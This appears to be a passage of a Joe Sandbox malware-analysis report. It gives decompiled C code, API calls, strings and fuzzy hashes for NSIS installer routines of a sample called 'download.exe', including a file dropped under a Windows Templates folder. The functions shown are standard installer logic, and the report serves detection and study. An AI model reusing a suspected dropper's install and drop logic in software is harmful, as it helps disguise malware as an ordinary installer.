                                                      				 *((intOrPtr*)(_t111 - 0x7c)) = E00402ACB(0xffffffcd);
                                                      				 *((intOrPtr*)(_t111 - 0x34)) = E00402ACB(0x45);
                                                      				_t55 =  *(_t111 - 0x18);
                                                      				 *(_t111 - 0x88) = _t55 & 0x00000fff;
                                                      				_t105 = _t55 & 0x00008000;
                                                      				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                      				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
                                                      				if(E00405982( *(_t111 - 0xc)) == 0) {
                                                      					E00402ACB(0x21);
                                                      				}
                                                      				_t59 = _t111 + 8;
                                                      				__imp__CoCreateInstance(0x408410, _t87, 1, 0x408400, _t59); // executed
                                                      				if(_t59 < _t87) {
                                                      					L15:
                                                      					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                      					_push(0xfffffff0);
                                                      				} else {
                                                      					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                      					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408420, _t111 - 0x30);
                                                      					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                      					if(_t64 >= _t87) {
                                                      						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                      						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                      						if(_t105 == _t87) {
                                                      							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                      							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize");
                                                      						}
                                                      						if(_t109 != _t87) {
                                                      							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                      							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                      						}
                                                      						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                      						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
                                                      						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
                                                      						if( *_t95 != _t87) {
                                                      							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                      							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
                                                      						}
                                                      						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                      						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
                                                      						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                      						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
                                                      						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                      							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                      							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                      								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                      								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                      							}
                                                      						}
                                                      						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                      						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                      					}
                                                      					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                      					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                      					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                      						_push(0xfffffff4);
                                                      					} else {
                                                      						goto L15;
                                                      					}
                                                      				}
                                                      				E00401423();
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t111 - 4));
                                                      				return 0;
                                                      			}























                                                      APIs
                                                      • CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize, xrefs: 00402193
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize
                                                      • API String ID: 123533781-2284297545
                                                      • Opcode ID: 1b6ba08932179521d31179491063ac25ac72046f538eaf8da177d2cba04aa769
                                                      • Instruction ID: 9e9d5d88055110978c4ae6826d2e5e59fb59f3b6f63c31ddbaa09ad4cf03e3db
                                                      • Opcode Fuzzy Hash: 1b6ba08932179521d31179491063ac25ac72046f538eaf8da177d2cba04aa769
                                                      • Instruction Fuzzy Hash: F4511871A00208BFCF10DFE4C989A9D7BB5BF48318F2085AAF515EB2D1DA799941CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00406280(CHAR* _a4) {
                                                      				void* _t2;
                                                      
                                                      				_t2 = FindFirstFileA(_a4, 0x7a0d90); // executed
                                                      				if(_t2 == 0xffffffff) {
                                                      					return 0;
                                                      				}
                                                      				FindClose(_t2);
                                                      				return 0x7a0d90;
                                                      			}





                                                      APIs
                                                      • FindFirstFileA.KERNELBASE(75A63410,007A0D90,Forgngeliges.rea,00405A46,Forgngeliges.rea,Forgngeliges.rea,00000000,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\), ref: 0040628B
                                                      • FindClose.KERNEL32(00000000), ref: 00406297
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: Forgngeliges.rea
                                                      • API String ID: 2295610775-2553225184
                                                      • Opcode ID: c24f07e19fd736ab640c4fa4be5052e5aaef0f0ac654c0d60e62e1f7b242b1f9
                                                      • Instruction ID: 649fadc54739959b3e8e38c8a8f4dd54304d89d7bf2914afa8982a1acff588dd
                                                      • Opcode Fuzzy Hash: c24f07e19fd736ab640c4fa4be5052e5aaef0f0ac654c0d60e62e1f7b242b1f9
                                                      • Instruction Fuzzy Hash: E0D012729051205FCA006778AE0C84B7A589F46370B114B7AB4AAF15E0CA788C7286D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 41%
                                                      			E004026FE(char __ebx, char* __edi, char* __esi) {
                                                      				void* _t6;
                                                      				void* _t19;
                                                      
                                                      				_t6 = FindFirstFileA(E00402ACB(2), _t19 - 0x1c8); // executed
                                                      				if(_t6 != 0xffffffff) {
                                                      					E00405EDB(__edi, _t6);
                                                      					_push(_t19 - 0x19c);
                                                      					_push(__esi);
                                                      					E00405F7D();
                                                      				} else {
                                                      					 *__edi = __ebx;
                                                      					 *__esi = __ebx;
                                                      					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t19 - 4));
                                                      				return 0;
                                                      			}






                                                      APIs
                                                      • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040270D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: bb1fd79773653f64b355e8a14e31788b575d62927d75190881792420c8ccdb6e
                                                      • Instruction ID: d02168588d0434b50479f8c5d7bfa648a046adbf5aa12c789179644532e0cc19
                                                      • Opcode Fuzzy Hash: bb1fd79773653f64b355e8a14e31788b575d62927d75190881792420c8ccdb6e
                                                      • Instruction Fuzzy Hash: 19F0A072604111EBD701E7A49949DEEB7688F15328FA0457BE281F20C1D6B88A459B3A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 96%
                                                      			E004037AB(void* __eflags) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				int _v12;
                                                      				void _v16;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr* _t17;
                                                      				signed int _t21;
                                                      				void* _t25;
                                                      				void* _t27;
                                                      				int _t28;
                                                      				void* _t31;
                                                      				int _t34;
                                                      				int _t35;
                                                      				intOrPtr _t36;
                                                      				int _t39;
                                                      				intOrPtr _t55;
                                                      				char _t57;
                                                      				CHAR* _t59;
                                                      				signed char _t63;
                                                      				signed short _t67;
                                                      				struct HINSTANCE__* _t71;
                                                      				CHAR* _t74;
                                                      				intOrPtr _t76;
                                                      				CHAR* _t81;
                                                      
                                                      				_t76 =  *0x7a2f54; // 0xae4de0
                                                      				_t17 = E00406315(2);
                                                      				_t84 = _t17;
                                                      				if(_t17 == 0) {
                                                      					_t74 = 0x79f540;
                                                      					"1033" = 0x30;
                                                      					 *0x7aa001 = 0x78;
                                                      					 *0x7aa002 = 0;
                                                      					E00405E64(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f540, 0);
                                                      					__eflags =  *0x79f540;
                                                      					if(__eflags == 0) {
                                                      						E00405E64(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M00408362, 0x79f540, 0);
                                                      					}
                                                      					lstrcatA("1033", _t74);
                                                      				} else {
                                                      					_t67 =  *_t17(); // executed
                                                      					E00405EDB("1033", _t67 & 0x0000ffff);
                                                      				}
                                                      				E00403A70(_t71, _t84);
                                                      				_t21 =  *0x7a2f5c; // 0x80
                                                      				_t80 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize";
                                                      				 *0x7a2fe0 = _t21 & 0x00000020;
                                                      				 *0x7a2ffc = 0x10000;
                                                      				if(E00405A03(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize") != 0) {
                                                      					L16:
                                                      					if(E00405A03(_t92, _t80) == 0) {
                                                      						_t8 = _t76 + 0x118; // 0x4a
                                                      						E00405F9F(0, _t74, _t76, _t80,  *_t8); // executed
                                                      					}
                                                      					_t25 = LoadImageA( *0x7a2f40, 0x67, 1, 0, 0, 0x8040); // executed
                                                      					 *0x7a2728 = _t25;
                                                      					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                      						L21:
                                                      						if(E0040140B(0) == 0) {
                                                      							_t27 = E00403A70(_t71, __eflags);
                                                      							__eflags =  *0x7a3000;
                                                      							if( *0x7a3000 != 0) {
                                                      								_t28 = E00405176(_t27, 0);
                                                      								__eflags = _t28;
                                                      								if(_t28 == 0) {
                                                      									E0040140B(1);
                                                      									goto L33;
                                                      								}
                                                      								__eflags =  *0x7a270c; // 0x0
                                                      								if(__eflags == 0) {
                                                      									E0040140B(2);
                                                      								}
                                                      								goto L22;
                                                      							}
                                                      							ShowWindow( *0x79f520, 5); // executed
                                                      							_t34 = E004062A7("RichEd20"); // executed
                                                      							__eflags = _t34;
                                                      							if(_t34 == 0) {
                                                      								E004062A7("RichEd32");
                                                      							}
                                                      							_t81 = "RichEdit20A";
                                                      							_t35 = GetClassInfoA(0, _t81, 0x7a26e0);
                                                      							__eflags = _t35;
                                                      							if(_t35 == 0) {
                                                      								GetClassInfoA(0, "RichEdit", 0x7a26e0);
                                                      								 *0x7a2704 = _t81;
                                                      								RegisterClassA(0x7a26e0);
                                                      							}
                                                      							_t36 =  *0x7a2720; // 0x0
                                                      							_t39 = DialogBoxParamA( *0x7a2f40, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B48, 0); // executed
                                                      							E004036FB(E0040140B(5), 1);
                                                      							return _t39;
                                                      						}
                                                      						L22:
                                                      						_t31 = 2;
                                                      						return _t31;
                                                      					} else {
                                                      						_t71 =  *0x7a2f40; // 0x400000
                                                      						 *0x7a26e4 = E00401000;
                                                      						 *0x7a26f0 = _t71;
                                                      						 *0x7a26f4 = _t25;
                                                      						 *0x7a2704 = 0x40a1f4;
                                                      						if(RegisterClassA(0x7a26e0) == 0) {
                                                      							L33:
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						}
                                                      						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                      						 *0x79f520 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f40, 0);
                                                      						goto L21;
                                                      					}
                                                      				} else {
                                                      					_t1 = _t76 + 0x48; // 0x0
                                                      					_t71 =  *_t1;
                                                      					_t86 = _t71;
                                                      					if(_t71 == 0) {
                                                      						goto L16;
                                                      					}
                                                      					_t2 = _t76 + 0x4c; // 0x0
                                                      					_t55 =  *0x7a2f98; // 0xae8c88
                                                      					_t74 = 0x7a1ee0;
                                                      					_t71 = _t71 + _t55;
                                                      					_t3 = _t76 + 0x44; // 0x0
                                                      					E00405E64(_t71, _t86,  *_t3, _t71,  *_t2 + _t55, 0x7a1ee0, 0);
                                                      					_t57 =  *0x7a1ee0; // 0x43
                                                      					if(_t57 == 0) {
                                                      						goto L16;
                                                      					}
                                                      					if(_t57 == 0x22) {
                                                      						_t74 = 0x7a1ee1;
                                                      						 *((char*)(E00405940(0x7a1ee1, 0x22))) = 0;
                                                      					}
                                                      					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                      					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                      						L15:
                                                      						E00405F7D(_t80, E00405915(_t74));
                                                      						goto L16;
                                                      					} else {
                                                      						_t63 = GetFileAttributesA(_t74);
                                                      						if(_t63 == 0xffffffff) {
                                                      							L14:
                                                      							E0040595C(_t74);
                                                      							goto L15;
                                                      						}
                                                      						_t92 = _t63 & 0x00000010;
                                                      						if((_t63 & 0x00000010) != 0) {
                                                      							goto L15;
                                                      						}
                                                      						goto L14;
                                                      					}
                                                      				}
                                                      			}






























                                                      APIs
                                                        • Part of subcall function 00406315: GetModuleHandleA.KERNEL32(?,?,?,0040325C,0000000A), ref: 00406327
                                                        • Part of subcall function 00406315: GetProcAddress.KERNEL32(00000000,?), ref: 00406342
                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,75A63410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\download.exe",00000000), ref: 004037C5
                                                        • Part of subcall function 00405EDB: wsprintfA.USER32 ref: 00405EE8
                                                      • lstrcatA.KERNEL32(1033,0079F540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F540,00000000,00000002,75A63410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\download.exe",00000000), ref: 00403826
                                                      • lstrlenA.KERNEL32(Call,00000000,00000000,00000000,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,1033,0079F540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F540,00000000,00000002,75A63410), ref: 0040389B
                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004038AE
                                                      • GetFileAttributesA.KERNEL32(Call), ref: 004038B9
                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize), ref: 00403902
                                                      • RegisterClassA.USER32(007A26E0), ref: 0040393F
                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403957
                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040398C
                                                      • ShowWindow.USER32(00000005,00000000), ref: 004039C2
                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 004039EE
                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 004039FB
                                                      • RegisterClassA.USER32(007A26E0), ref: 00403A04
                                                      • DialogBoxParamA.USER32(?,00000000,00403B48,00000000), ref: 00403A23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                      • API String ID: 606308-2825270492
                                                      • Opcode ID: 7c17711a53f5d675b216d633321a2e6c9060460c0893605bcdabe41a28e1cda8
                                                      • Instruction ID: dff23d5ef8b44838d5d7b4120faab130ca8a02140368ea181f7986d44215ec0e
                                                      • Opcode Fuzzy Hash: 7c17711a53f5d675b216d633321a2e6c9060460c0893605bcdabe41a28e1cda8
                                                      • Instruction Fuzzy Hash: 4661B571240600BED610AF659D45F3B3AACDB85749F00857FF981B62E2DB7D9D028B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 363 402d63-402db1 GetTickCount GetModuleFileNameA call 405b16 366 402db3-402db8 363->366 367 402dbd-402deb call 405f7d call 40595c call 405f7d GetFileSize 363->367 368 402f95-402f99 366->368 375 402df1 367->375 376 402ed8-402ee6 call 402cff 367->376 378 402df6-402e0d 375->378 382 402ee8-402eeb 376->382 383 402f3b-402f40 376->383 380 402e11-402e1a call 40318b 378->380 381 402e0f 378->381 389 402e20-402e27 380->389 390 402f42-402f4a call 402cff 380->390 381->380 385 402eed-402f05 call 4031a1 call 40318b 382->385 386 402f0f-402f39 GlobalAlloc call 4031a1 call 402f9c 382->386 383->368 385->383 411 402f07-402f0d 385->411 386->383 409 402f4c-402f5d 386->409 394 402ea3-402ea7 389->394 395 402e29-402e3d call 405ad1 389->395 390->383 399 402eb1-402eb7 394->399 400 402ea9-402eb0 call 402cff 394->400 395->399 414 402e3f-402e46 395->414 406 402ec6-402ed0 399->406 407 402eb9-402ec3 call 4063cc 399->407 400->399 406->378 410 402ed6 406->410 407->406 416 402f65-402f6a 409->416 417 402f5f 409->417 410->376 411->383 411->386 414->399 415 402e48-402e4f 414->415 415->399 419 402e51-402e58 415->419 420 402f6b-402f71 416->420 417->416 419->399 421 402e5a-402e61 419->421 420->420 422 402f73-402f8e SetFilePointer call 405ad1 420->422 421->399 423 402e63-402e83 421->423 426 402f93 422->426 423->383 425 402e89-402e8d 423->425 427 402e95-402e9d 425->427 428 402e8f-402e93 425->428 426->368 427->399 429 402e9f-402ea1 427->429 428->410 428->427 429->399
                                                      C-Code - Quality: 80%
                                                      			E00402D63(void* __eflags, signed int _a4) {
                                                      				DWORD* _v8;
                                                      				DWORD* _v12;
                                                      				void* _v16;
                                                      				intOrPtr _v20;
                                                      				long _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				signed int _v44;
                                                      				long _t43;
                                                      				signed int _t50;
                                                      				void* _t53;
                                                      				signed int _t54;
                                                      				void* _t57;
                                                      				intOrPtr* _t59;
                                                      				long _t60;
                                                      				signed int _t65;
                                                      				signed int _t67;
                                                      				signed int _t70;
                                                      				signed int _t71;
                                                      				signed int _t77;
                                                      				intOrPtr _t80;
                                                      				long _t82;
                                                      				signed int _t85;
                                                      				signed int _t87;
                                                      				void* _t89;
                                                      				signed int _t90;
                                                      				signed int _t93;
                                                      				void* _t94;
                                                      
                                                      				_t82 = 0;
                                                      				_v12 = 0;
                                                      				_v8 = 0;
                                                      				_t43 = GetTickCount();
                                                      				_t91 = "C:\\Users\\Arthur\\Desktop\\download.exe";
                                                      				 *0x7a2f50 = _t43 + 0x3e8; // executed
                                                      				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\download.exe", 0x400); // executed
                                                      				_t89 = E00405B16(_t91, 0x80000000, 3);
                                                      				_v16 = _t89;
                                                      				 *0x40a018 = _t89;
                                                      				if(_t89 == 0xffffffff) {
                                                      					return "Error launching installer";
                                                      				}
                                                      				_t92 = "C:\\Users\\Arthur\\Desktop";
                                                      				E00405F7D("C:\\Users\\Arthur\\Desktop", _t91);
                                                      				E00405F7D(0x7ab000, E0040595C(_t92));
                                                      				_t50 = GetFileSize(_t89, 0);
                                                      				__eflags = _t50;
                                                      				 *0x7960fc = _t50;
                                                      				_t93 = _t50;
                                                      				if(_t50 <= 0) {
                                                      					L24:
                                                      					E00402CFF(1);
                                                      					__eflags =  *0x7a2f58 - _t82; // 0x3fc00
                                                      					if(__eflags == 0) {
                                                      						goto L29;
                                                      					}
                                                      					__eflags = _v8 - _t82;
                                                      					if(_v8 == _t82) {
                                                      						L28:
                                                      						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                      						_t94 = _t53;
                                                      						_t54 =  *0x7a2f58; // 0x3fc00
                                                      						E004031A1(_t54 + 0x1c);
                                                      						_push(_v24);
                                                      						_push(_t94);
                                                      						_push(_t82);
                                                      						_push(0xffffffff); // executed
                                                      						_t57 = E00402F9C(); // executed
                                                      						__eflags = _t57 - _v24;
                                                      						if(_t57 == _v24) {
                                                      							__eflags = _v44 & 0x00000001;
                                                      							 *0x7a2f54 = _t94;
                                                      							 *0x7a2f5c =  *_t94;
                                                      							if((_v44 & 0x00000001) != 0) {
                                                      								 *0x7a2f60 =  *0x7a2f60 + 1;
                                                      								__eflags =  *0x7a2f60;
                                                      							}
                                                      							_t40 = _t94 + 0x44; // 0x44
                                                      							_t59 = _t40;
                                                      							_t85 = 8;
                                                      							do {
                                                      								_t59 = _t59 - 8;
                                                      								 *_t59 =  *_t59 + _t94;
                                                      								_t85 = _t85 - 1;
                                                      								__eflags = _t85;
                                                      							} while (_t85 != 0);
                                                      							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                      							 *(_t94 + 0x3c) = _t60;
                                                      							E00405AD1(0x7a2f80, _t94 + 4, 0x40);
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						}
                                                      						goto L29;
                                                      					}
                                                      					E004031A1( *0x78a0f4);
                                                      					_t65 = E0040318B( &_a4, 4);
                                                      					__eflags = _t65;
                                                      					if(_t65 == 0) {
                                                      						goto L29;
                                                      					}
                                                      					__eflags = _v12 - _a4;
                                                      					if(_v12 != _a4) {
                                                      						goto L29;
                                                      					}
                                                      					goto L28;
                                                      				} else {
                                                      					do {
                                                      						_t67 =  *0x7a2f58; // 0x3fc00
                                                      						_t90 = _t93;
                                                      						asm("sbb eax, eax");
                                                      						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                      						__eflags = _t93 - _t70;
                                                      						if(_t93 >= _t70) {
                                                      							_t90 = _t70;
                                                      						}
                                                      						_t71 = E0040318B(0x796100, _t90);
                                                      						__eflags = _t71;
                                                      						if(_t71 == 0) {
                                                      							E00402CFF(1);
                                                      							L29:
                                                      							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                      						}
                                                      						__eflags =  *0x7a2f58;
                                                      						if( *0x7a2f58 != 0) {
                                                      							__eflags = _a4 & 0x00000002;
                                                      							if((_a4 & 0x00000002) == 0) {
                                                      								E00402CFF(0);
                                                      							}
                                                      							goto L20;
                                                      						}
                                                      						E00405AD1( &_v44, 0x796100, "true");
                                                      						_t77 = _v44;
                                                      						__eflags = _t77 & 0xfffffff0;
                                                      						if((_t77 & 0xfffffff0) != 0) {
                                                      							goto L20;
                                                      						}
                                                      						__eflags = _v40 - 0xdeadbeef;
                                                      						if(_v40 != 0xdeadbeef) {
                                                      							goto L20;
                                                      						}
                                                      						__eflags = _v28 - 0x74736e49;
                                                      						if(_v28 != 0x74736e49) {
                                                      							goto L20;
                                                      						}
                                                      						__eflags = _v32 - 0x74666f73;
                                                      						if(_v32 != 0x74666f73) {
                                                      							goto L20;
                                                      						}
                                                      						__eflags = _v36 - 0x6c6c754e;
                                                      						if(_v36 != 0x6c6c754e) {
                                                      							goto L20;
                                                      						}
                                                      						_a4 = _a4 | _t77;
                                                      						_t87 =  *0x78a0f4; // 0xa4d3a
                                                      						 *0x7a3000 =  *0x7a3000 | _a4 & 0x00000002;
                                                      						_t80 = _v20;
                                                      						__eflags = _t80 - _t93;
                                                      						 *0x7a2f58 = _t87;
                                                      						if(_t80 > _t93) {
                                                      							goto L29;
                                                      						}
                                                      						__eflags = _a4 & 0x00000008;
                                                      						if((_a4 & 0x00000008) != 0) {
                                                      							L16:
                                                      							_v8 = _v8 + 1;
                                                      							_t24 = _t80 - 4; // 0x40a194
                                                      							_t93 = _t24;
                                                      							__eflags = _t90 - _t93;
                                                      							if(_t90 > _t93) {
                                                      								_t90 = _t93;
                                                      							}
                                                      							goto L20;
                                                      						}
                                                      						__eflags = _a4 & 0x00000004;
                                                      						if((_a4 & 0x00000004) != 0) {
                                                      							break;
                                                      						}
                                                      						goto L16;
                                                      						L20:
                                                      						__eflags = _t93 -  *0x7960fc; // 0xa6270
                                                      						if(__eflags < 0) {
                                                      							_v12 = E004063CC(_v12, 0x796100, _t90);
                                                      						}
                                                      						 *0x78a0f4 =  *0x78a0f4 + _t90;
                                                      						_t93 = _t93 - _t90;
                                                      						__eflags = _t93;
                                                      					} while (_t93 > 0);
                                                      					_t82 = 0;
                                                      					__eflags = 0;
                                                      					goto L24;
                                                      				}
                                                      			}


                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402D74
                                                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\download.exe,00000400), ref: 00402D90
                                                        • Part of subcall function 00405B16: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405B1A
                                                        • Part of subcall function 00405B16: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B3C
                                                      • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\download.exe,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00402DDC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$:M$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\download.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$pb$soft
                                                      • API String ID: 4283519449-2933133286
                                                      • Opcode ID: c070d1a6a1e642fc9781c75ed052fb1a39172e96787f639e7ba8b58f5885ef14
                                                      • Instruction ID: e7e10bf14dd6c84c423c7e0fea7576ec82b222124ef8da9379000f3ec2b80706
                                                      • Opcode Fuzzy Hash: c070d1a6a1e642fc9781c75ed052fb1a39172e96787f639e7ba8b58f5885ef14
                                                      • Instruction Fuzzy Hash: 7151D371940215AFDB119F64DE89A5F7BB8EB04368F10413BF904B62D1D7BC8E818B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      [Control-flow graph of function 00405F9F; legend: Executed / Not Executed]
                                                      C-Code - Quality: 72%
                                                      			E00405F9F(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                      				struct _ITEMIDLIST* _v8;
                                                      				char _v12;
                                                      				signed int _v16;
                                                      				signed char _v20;
                                                      				signed int _v24;
                                                      				signed char _v28;
                                                      				signed int _t38;
                                                      				CHAR* _t39;
                                                      				signed int _t41;
                                                      				char _t52;
                                                      				char _t53;
                                                      				char _t55;
                                                      				char _t57;
                                                      				void* _t65;
                                                      				char* _t66;
                                                      				intOrPtr _t76;
                                                      				signed int _t80;
                                                      				intOrPtr _t86;
                                                      				char _t88;
                                                      				void* _t89;
                                                      				CHAR* _t90;
                                                      				void* _t92;
                                                      				signed int _t97;
                                                      				signed int _t99;
                                                      				void* _t100;
                                                      
                                                      				_t92 = __esi;
                                                      				_t89 = __edi;
                                                      				_t65 = __ebx;
                                                      				_t38 = _a8;
                                                      				if(_t38 < 0) {
                                                      					_t86 =  *0x7a271c; // 0xaea04d
                                                      					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                      				}
                                                      				_t76 =  *0x7a2f98; // 0xae8c88
                                                      				_push(_t65);
                                                      				_push(_t92);
                                                      				_push(_t89);
                                                      				_t66 = _t38 + _t76;
                                                      				_t39 = 0x7a1ee0;
                                                      				_t90 = 0x7a1ee0;
